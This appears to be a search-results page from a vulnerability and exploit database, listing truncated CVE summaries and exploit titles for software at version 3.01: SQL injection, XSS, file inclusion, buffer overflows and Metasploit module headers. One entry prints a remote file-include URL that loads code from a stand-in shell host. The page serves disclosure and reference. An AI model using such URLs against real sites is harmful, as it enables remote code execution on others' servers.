96 matches found
CVE-2017-16560
The SanDisk Secure Access 3.01 vault may decrypt and copy encrypted files to a temporary folder, leaving plaintext copies on disk indefinitely in certain scenarios (e.g., when editing a file or after a crash). This stems from temporary plaintext files retained on disk. Affected product: SanDisk S...
Social Network Script 3.01 - id Parameter SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Social Network Script v3.01 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/social-network-script/ Demo: http://myeliteprofile.co...
Groupon Clone Script 3.01 SQL Injection
Exploit Title: Groupon Clone Script v3.01 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/groupon-clone-script/ Demo: http://phpscriptsmall.info/demo/groupon-deal/ Version: 3.01 Tested on: Win7 x64,...
Groupon Clone Script 3.01 - 'catid' SQL Injection
Exploit Title: Groupon Clone Script v3.01 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/groupon-clone-script/ Demo: http://phpscriptsmall.info/demo/groupon-deal/ Version: 3.01 Tested on: Win7 x64,...
Social Network Script 3.01 - 'id' SQL Injection
Exploit Title: Social Network Script v3.01 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/social-network-script/ Demo: http://myeliteprofile.com/ Version: 3.01 Tested on: Win7 x64, Kali Linux x64...
CVE-2015-2850
Cross-site scripting XSS vulnerability in index-login.ant in the ANTlabs InnGate firmware on IG 3100, InnGate 3.01 E, InnGate 3.10 E, InnGate 3.10 M, SG 4, and SSG 4 devices allows remote attackers to inject arbitrary web script or HTML via the msg parameter...
Cross site scripting
Cross-site scripting XSS vulnerability in index-login.ant in the ANTlabs InnGate firmware on IG 3100, InnGate 3.01 E, InnGate 3.10 E, InnGate 3.10 M, SG 4, and SSG 4 devices allows remote attackers to inject arbitrary web script or HTML via the msg parameter...
CVE-2015-2849
SQL injection vulnerability in main.ant in the ANTlabs InnGate firmware on IG 3100, InnGate 3.01 E, InnGate 3.10 E, InnGate 3.10 M, SG 4, and SSG 4 devices, when https is used, allows remote attackers to execute arbitrary SQL commands via the ppli parameter...
CVE-2015-2849
Summary (CVE-2015-2849) : The ANTlabs InnGate firmware (IG3100, InnGate 3.01 E, 3.10 E, 3.10 M, SG 4, SSG 4) contains a SQL injection vulnerability in the main.ant page. The issue arises from the ppli URL parameter; when using HTTPS, a remote attacker can induce arbitrary SQL commands on the unde...
CVE-2015-2850
The CVE-2015-2850 issue affects ANTlabs InnGate firmware (IG 3100 and InnGate 3.01 E, 3.10 E, 3.10 M, SG 4, SSG 4). The vulnerability is a Cross-Site Scripting (XSS) in the index-login.ant page, exploitable via the msg parameter. Root cause is improper input handling that allows injected web scri...
CVE-2015-0932
The ANTlabs InnGate firmware on IG 3100, IG 3101, InnGate 3.00 E, InnGate 3.01 E, InnGate 3.02 E, InnGate 3.10 E, InnGate 3.01 G, and InnGate 3.10 G devices does not require authentication for rsync sessions, which allows remote attackers to read or write to arbitrary files via TCP traffic on por...
CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 Local File Include Vulnerability
No description provided by source. CaupoShop Pro 2.x/ = 3.70 Local File Include Vulnerability ----------------------------------------------------------------------------------------- Vuln Softwares : CaupoShop Pro 2.x CaupoShop Classic 3.01 CaupoShop Pro 3.70 Discovered By : Rami Salama Contact ...
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
在文件bpncom.php中,未对包含对象参数bnrep做过滤导致远程文件包含漏洞,代码如下 include $bnrep."bnconfigs.php"; 可导致远程文件包含如下: http://example.com/path/bpncom.php?bnrep=http://SHELLURL.COM...
Trellian FTP Client 3.01 PASV Remote Buffer Overflow
No description provided by source. $Id: trellianclientpasv.rb 9525 2010-06-15 07:18:08Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms ...
fuzzylime (cms) 3.01 'blog.php' Local File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30121/info 'fuzzylime cms' is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary local script code. This can allo...
Distinct TFTP 3.01 Writable Directory Traversal Execution
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "Distinct TFTP 3.0...
CaupoShop Pro (2.x 3.70) Classic 3.01 - Local File Inclusion
CaupoShop Pro 2.x 3.70 Classic 3.01 - Local File Inclusion CaupoShop Pro 2.x/ = 3.70 Local File Include Vulnerability ----------------------------------------------------------------------------------------- Vuln Softwares : CaupoShop Pro 2.x CaupoShop Classic 3.01 CaupoShop Pro 3.70 Discovered B...
CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 Local File Include Vulnerability
Exploit for php platform in category web applications CaupoShop Pro 2.x/ = 3.70 Local File Include Vulnerability ----------------------------------------------------------------------------------------- Vuln Softwares : CaupoShop Pro 2.x CaupoShop Classic 3.01 CaupoShop Pro 3.70 Discovered By :...
Santafox XSS and CSRF Vulnerabilities
Santafox is prone to cross-site scripting XSS and cross-site request forgery CSRF vulnerabilities. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...
Trellian FTP Client PASV BOF Exploit
Exploit for windows platform in category remote exploits ==================================== Trellian FTP Client PASV BOF Exploit ==================================== Exploit Title: Trellian FTP Client PASV BOF exploit Date: 2010-04-11 Author: zombiefx Software Link:...